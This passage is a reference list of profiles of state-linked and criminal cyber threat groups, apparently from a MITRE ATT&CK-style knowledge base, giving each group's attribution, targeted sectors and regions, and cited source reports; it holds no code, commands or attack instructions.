Ke3chang is a threat group attributed to actors operating out of China. Ke3chang has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010. [Mandiant Operation Ke3chang November 2014](https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs) [NCC Group APT15 Alive and Strong](https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/) [APT15 Intezer June 2018](https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/) [Microsoft NICKEL December 2021](https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe)
APT12
APT12 is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. [Meyers Numbered Panda](http://www.crowdstrike.com/blog/whois-numbered-panda/)
Deep Panda
Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. [Alperovitch 2014](https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/) The intrusion into healthcare company Anthem has been attributed to Deep Panda. [ThreatConnect Anthem](https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. [RSA Shell Crew](https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf) Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. [Symantec Black Vine](https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf) Some analysts track Deep Panda and APT19 as the same group, but it is unclear from open source information if the groups are the same. [ICIT China's Espionage Jul 2016](https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/)
Turla
Turla is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. Turla is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos. [Kaspersky Turla](https://securelist.com/the-epic-turla-operation/65545/) [ESET Gazer Aug 2017](https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf) [CrowdStrike VENOMOUS BEAR](https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/) [ESET Turla Mosquito Jan 2018](https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf) [Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf)
PittyTiger
PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control. [Bizeul 2014](https://airbus-cyber-security.com/the-eye-of-the-tiger/) [Villeneuve 2014](https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html)
Darkhotel
Darkhotel is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. Darkhotel has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks. [Kaspersky Darkhotel](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf) [Securelist Darkhotel Aug 2015](https://securelist.com/darkhotels-attacks-in-2015/71713/) [Microsoft Digital Defense FY20 Sept 2020](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf)
APT30
APT30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches. [FireEye APT30](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf) [Baumgartner Golovkin Naikon 2015](https://securelist.com/the-naikon-apt/69953/)
DragonOK
DragonOK is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. [Operation Quantum Entanglement](https://web.archive.org/web/20210920193513/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. [New DragonOK](http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/)
admin@338
admin@338 is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. [FireEye admin@338](https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html)
Naikon
Naikon is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). [CameraShy](http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf) Active since at least 2010, Naikon has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN). [CameraShy](http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf) [Baumgartner Naikon 2015](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf) While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches. [Baumgartner Golovkin Naikon 2015](https://securelist.com/the-naikon-apt/69953/)
Equation
Equation is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. [Kaspersky Equation QA](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf)
Molerats
Molerats is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States. [DustySky](https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf) [DustySky2](http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf) [Kaspersky MoleRATs April 2019](https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/) [Cybereason Molerats Dec 2020](https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf)
APT3
APT3 is a China-based threat group that researchers have attributed to China's Ministry of State Security. [FireEye Clandestine Wolf](https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html) [Recorded Future APT3 May 2017](https://www.recordedfuture.com/research/chinese-mss-behind-apt3) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. [FireEye Clandestine Wolf](https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html) [FireEye Operation Double Tap](https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. [Symantec Buckeye](https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong)
APT16
APT16 is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. [FireEye EPS Awakens Part 2](https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html)
Putter Panda
Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). [CrowdStrike Putter Panda](http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf)
APT17
APT17 is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. [FireEye APT17](https://web.archive.org/web/20240119213200/https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf)
APT18
APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. [Dell Lateral Movement](http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/)
Threat Group-3390
Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims. [Dell TG-3390](https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors. [SecureWorks BRONZE UNION June 2017](https://www.secureworks.com/research/bronze-union) [Securelist LuckyMouse June 2018](https://securelist.com/luckymouse-hits-national-data-center/86083/) [Trend Micro DRBControl February 2020](https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf)
Threat Group-1314
Threat Group-1314 is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. [Dell TG-1314](https://web.archive.org/web/20150626073312/http://www.secureworks.com/resources/blog/living-off-the-land/)
Scarlet Mimic
Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, it has not been concluded that the groups are the same. [Scarlet Mimic Jan 2016](http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/)
Lotus Blossom
Lotus Blossom is a long-standing threat group largely targeting various entities in Asia since at least 2009. In addition to government and related targets, Lotus Blossom has also targeted entities such as digital certificate issuers. [Lotus Blossom Jun 2015](https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html) [Symantec Bilbug 2022](https://www.security.com/threat-intelligence/espionage-asia-governments-cert-authority) [Cisco LotusBlossom 2025](https://blog.talosintelligence.com/lotus-blossom-espionage-group/)
Poseidon Group
Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm. [Kaspersky Poseidon Group](https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/)
Sandworm Team
Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455. [US District Court Indictment GRU Unit 74455 October 2020](https://www.justice.gov/opa/press-release/file/1328521/download) [UK NCSC Olympic Attacks October 2020](https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games) This group has been active since at least 2009. [iSIGHT Sandworm 2014](https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html) [CrowdStrike VOODOO BEAR](https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/) [USDOJ Sandworm Feb 2020](https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia/index.html) [NCSC Sandworm Feb 2020](https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory) In October 2020, the US indicted six GRU Unit 74455 officers associated with Sandworm Team for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide NotPetya attack, targeting of the 2017 French presidential campaign, the 2018 Olympic Destroyer attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019. [US District Court Indictment GRU Unit 74455 October 2020](https://www.justice.gov/opa/press-release/file/1328521/download) [UK NCSC Olympic Attacks October 2020](https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as APT28. [US District Court Indictment GRU Oct 2018](https://www.justice.gov/opa/page/file/1098481/download)
Dragonfly
Dragonfly is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16. [DOJ Russia Targeting Critical Infrastructure March 2022](https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical) [UK GOV FSB Factsheet April 2022](https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet) Active since at least 2010, Dragonfly has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks. [Symantec Dragonfly](https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments) [Secureworks IRON LIBERTY July 2019](https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector) [Symantec Dragonfly Sept 2017](https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group) [Fortune Dragonfly 2.0 Sept 2017](http://fortune.com/2017/09/06/hack-energy-grid-symantec/) [Gigamon Berserk Bear October 2021](https://vblocalhost.com/uploads/VB2021-Slowik.pdf) [CISA AA20-296A Berserk Bear December 2020](https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions) [Symantec Dragonfly 2.0 October 2017](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks)
GCMAN
GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. [Securelist GCMAN](https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/)
FIN6
FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors. [FireEye FIN6 April 2016](https://web.archive.org/web/20190807112824/https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf) [FireEye FIN6 Apr 2019](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)
Stealth Falcon
Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. [Citizen Lab Stealth Falcon May 2016](https://citizenlab.org/2016/05/stealth-falcon/)
Suckfly
Suckfly is a China-based threat group that has been active since at least 2014. [Symantec Suckfly March 2016](http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates)
Patchwork
Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. [Cymmetria Patchwork](https://web.archive.org/web/20180825085952/https:/s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf) [Symantec Patchwork](http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries) [TrendMicro Patchwork Dec 2017](https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf) [Volexity Patchwork June 2018](https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/)
Strider
Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda. [Symantec Strider Blog](http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets) [Kaspersky ProjectSauron Blog](https://securelist.com/faq-the-projectsauron-apt/75533/)
Group5
Group5 is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. Group5 has used two commonly available remote access tools (RATs), njRAT and NanoCore, as well as an Android RAT, DroidJack. [Citizen Lab Group5](https://citizenlab.ca/2016/08/group5-syria/)
menuPass
menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company. [DOJ APT10 Dec 2018](https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion) [District Court of NY APT10 Indictment December 2018](https://www.justice.gov/opa/page/file/1122671/download) menuPass has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university. [Palo Alto menuPass Feb 2017](http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/) [Crowdstrike CrowdCast Oct 2013](https://www.slideshare.net/slideshow/crowd-casts-monthly-you-have-an-adversary-problem/27262315) [FireEye Poison Ivy](https://www.mandiant.com/sites/default/files/2021-09/rpt-poison-ivy.pdf) [PWC Cloud Hopper April 2017](https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [FireEye APT10 April 2017](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [DOJ APT10 Dec 2018](https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion) [District Court of NY APT10 Indictment December 2018](https://www.justice.gov/opa/page/file/1122671/download)
Gamaredon Group
Gamaredon Group is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name Gamaredon Group derives from a misspelling of the word "Armageddon," found in early campaigns. [Palo Alto Gamaredon Feb 2017](https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/) [TrendMicro Gamaredon April 2020](https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/) [ESET Gamaredon June 2020](https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/) [Symantec Shuckworm January 2022](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine) [Microsoft Actinium February 2022](https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/) In November 2021, the Ukrainian government publicly attributed Gamaredon Group to Russia’s Federal Security Service (FSB) Center 18, an assessment later supported by multiple independent cybersecurity researchers. [Bleepingcomputer Gamardeon FSB November 2021](https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/) [Microsoft Actinium February 2022](https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/)
RTM
RTM is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name (RTM). [ESET RTM Feb 2017](https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf)
FIN10
FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. [FireEye FIN10 June 2017](https://services.google.com/fh/files/misc/rpt-fin-10-anatomy-of-a-cyber-en.pdf)
CopyKittens
CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. [ClearSky CopyKittens March 2017](http://www.clearskysec.com/copykitten-jpost/) [ClearSky Wilted Tulip July 2017](http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf) [CopyKittens Nov 2015](https://cdn2.hubspot.net/hubfs/1903456/Whitepapers/CopyKittens.pdf)
FIN5
FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. [FireEye Respond Webinar July 2017](https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html) [Mandiant FIN5 GrrCON Oct 2016](https://www.youtube.com/watch?v=fevGZs0EQu8) [DarkReading FireEye FIN5 Oct 2015](https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?)
Sowbug
Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. [Symantec Sowbug Nov 2017](https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments)
NEODYMIUM
NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called PROMETHIUM due to overlapping victim and campaign characteristics. [Microsoft NEODYMIUM Dec 2016](https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/) [Microsoft SIR Vol 21](http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf) NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified. [CyberScoop BlackOasis Oct 2017](https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/)
PROMETHIUM
PROMETHIUM is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics. [Microsoft NEODYMIUM Dec 2016](https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/) [Microsoft SIR Vol 21](http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf) [Talos Promethium June 2020](https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html)
BRONZE BUTLER
BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry. [Trend Micro Daserf Nov 2017](http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/) [Secureworks BRONZE BUTLER Oct 2017](https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses) [Trend Micro Tick November 2019](https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf)
FIN8
FIN8 is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected FIN8 switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants. [FireEye Obfuscation June 2017](https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html) [FireEye Fin8 May 2016](https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html) [Bitdefender Sardonic Aug 2021](https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf) [Symantec FIN8 Jul 2023](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor)
TA459
TA459 is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. [Proofpoint TA459 April 2017](https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts)
BlackOasis
BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. [Securelist BlackOasis Oct 2017](https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/) [Securelist APT Trends Q2 2017](https://securelist.com/apt-trends-report-q2-2017/79332/) A group known by Microsoft as NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified. [CyberScoop BlackOasis Oct 2017](https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/)
APT33
APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. [FireEye APT33 Sept 2017](https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html) [FireEye APT33 Webinar Sept 2017](https://www.brighttalk.com/webcast/10703/275683)
Elderwood
Elderwood is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. [Security Affairs Elderwood Sept 2012](http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. [Symantec Elderwood Sept 2012](https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf) [CSM Elderwood Sept 2012](https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China)
APT37
APT37 is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. APT37 has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018. [FireEye APT37 Feb 2018](https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf) [Securelist ScarCruft Jun 2016](https://securelist.com/operation-daybreak/75100/) [Talos Group123](https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
PLATINUM
PLATINUM is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. [Microsoft PLATINUM April 2016](https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf)
MuddyWater
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). [CYBERCOM Iranian Intel Cyber January 2022](https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/) Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America. [Unit 42 MuddyWater Nov 2017](https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/) [Symantec MuddyWater Dec 2018](https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group) [ClearSky MuddyWater Nov 2018](https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf) [ClearSky MuddyWater June 2019](https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf) [Reaqta MuddyWater November 2017](https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/) [DHS CISA AA22-055A MuddyWater February 2022](https://www.cisa.gov/uscert/ncas/alerts/aa22-055a) [Talos MuddyWater Jan 2022](https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html)
Dark Caracal
Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. [Lookout Dark Caracal Jan 2018](https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf)
Orangeworm
Orangeworm is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage. [Symantec Orangeworm April 2018](https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia) Reverse engineering of Kwampirs, directly associated with Orangeworm activity, indicates significant functional and development overlaps with Shamoon. [Cylera Kwampirs 2022](https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf)
APT19
APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. [FireEye APT19](https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html) Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same. [ICIT China's Espionage Jul 2016](https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/) [FireEye APT Groups](https://www.fireeye.com/current-threats/apt-groups.html#apt19) [Unit 42 C0d0so0 Jan 2016](https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/)
Rancor
